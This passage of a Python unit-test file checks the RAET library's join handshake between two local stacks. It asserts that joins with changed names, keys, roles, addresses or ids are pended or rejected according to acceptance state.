roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemoteAlpha)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(beta.mutable)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemoteAlpha, remoteData))
self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousPendingNorenewPendSameAll(self):
'''
Test mutable joiner pend pending vacuous non renewal join with same all (G2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousPendingNorenewPendSameAll.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Body
# Main: Body
# Kind: Body
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Body
# Keys: Body
# Sameness: SameAll
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: No
self.join(beta, alpha, deid=betaRemote.nuid, renewal=False, duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousImmutableRejectNewName(self):
'''
Test immutable joiner reject non vacuous join with updated name (H1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewName.__doc__))
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Name: New
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: No
self.assertIs(beta.mutable, None)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousImmutableRejectNewMain(self):
'''
Test immutable joiner reject non vacuous join with updated main (H2)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewMain.__doc__))
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Vacuous: No
# Main: New (set main to false in betaRemote)
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=False,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Name: Either
# Main: New
self.assertIs(betaRemote.main, False)
self.assertIs(alpha.main, True)
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: No
self.assertIs(beta.mutable, None)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousImmutableRejectNewKind(self):
'''
Test immutable joiner reject non vacuous join with updated kind (H3)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewKind.__doc__))
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: New
oldKind = None
newKind = 33
self.assertIs(alpha.kind, oldKind)
alpha.kind = newKind
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: No
self.assertIs(beta.mutable, None)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousImmutableRejectNewRha(self):
'''
Test immutable joiner reject non vacuous join with updated host address (H4)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewRha.__doc__))
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Simulate: beta already know alpha with ha=('127.0.0.1', 7532)
# alpha responds with ha=('127.0.0.1', 7530)
fakeHa = (alpha.local.ha[0], 7532)
realHa = (alpha.local.ha[0], alpha.local.ha[1])
# Vacuous: No
betaRemoteAlpha = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=realHa,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemoteBeta = estating.RemoteEstate(stack=beta,
fuid=betaRemoteAlpha.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemoteAlpha.fuid = alphaRemoteBeta.nuid
alpha.addRemote(alphaRemoteBeta)
beta.addRemote(betaRemoteAlpha)
# Name: Either
# Main: Either
# Kind: Either
# RHA: New
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(betaRemoteAlpha.ha, realHa)
self.assertEqual(alpha.local.ha, realHa)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
console.terse("\n Rejoin with new host address **************\n")
beta.join(uid=betaRemoteAlpha.uid)
beta.serviceOneAllTx()
self.store.advanceStamp(0.05)
time.sleep(0.05)
alpha.serviceOneAllRx()
alpha.serviceOneAllTx() # Join ack
self.store.advanceStamp(0.05)
time.sleep(0.05)
# Change betaRemoteAlpha Rha value to make beta think alpha respond from new HA
betaRemoteAlpha.ha = fakeHa
keep = self.copyData(betaRemoteAlpha)
# Finish join
self.serviceStacks([beta, alpha])
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertIs(betaRemoteAlpha.acceptance, None)
# Assert betaRemote isn't modified
self.assertTrue(self.sameAll(betaRemoteAlpha, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousImmutableRejectNewFuid(self):
'''
Test immutable joiner reject non vacuous join with updated fuid/reid (H5)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewFuid.__doc__))
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: New:
# 1. Initiate join with initFuid
# 2. Update betaRemote.fuid = fakeFuid
# 3. Accept alpha responce:
# - alpha will respond with initFuid
# - beta will know fakeFuid
initFuid = alphaRemote.nuid
fakeFuid = initFuid + 10
# Leid: Old
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
# Mutable: No
self.assertIs(beta.mutable, None)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
console.terse("\nJoin Transaction **************\n")
beta.join(uid=betaRemote.nuid)
betaRemote.fuid = fakeFuid
keep = self.copyData(betaRemote)
self.serviceStacks([alpha, beta])
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousImmutableRejectNewKeys(self):
'''
Test immutable joiner reject non vacuous join with updated keys (H6)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewKeys.__doc__))
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Old
# Keys: New
alpha.local.signer = nacling.Signer()
alpha.local.priver = nacling.Privateer()
alpha.dumpLocalRole()
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: No
self.assertIs(beta.mutable, None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousImmutableRejectNewRole(self):
'''
Test immutable joiner reject non vacuous join with updated name (H7)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewRole.__doc__))
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: New
oldRole = alpha.local.role
newRole = '{0}_new'.format(oldRole)
alpha.local.role = newRole
alpha.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: No
self.assertIs(beta.mutable, None)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Check beta knows nothing about new role
roleData = beta.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousRejectedRejectNewKeys(self):
'''
Test mutable joiner reject non vacuous join with updated keys (I1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousRejectedRejectNewKeys.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
beta.keep.rejectRemote(betaRemote)
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Old
# Keys: New
alpha.local.signer = nacling.Signer()
alpha.local.priver = nacling.Privateer()
alpha.dumpLocalRole()
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.rejected.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousRejectedRejectNewRole(self):
'''
Test mutable joiner reject non vacuous join with updated role (I2)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousRejectedRejectNewRole.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
beta.keep.rejectRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: New
oldRole = alpha.local.role
newRole = '{0}_new'.format(oldRole)
alpha.local.role = newRole
alpha.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Check beta knows nothing about new role
roleData = beta.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
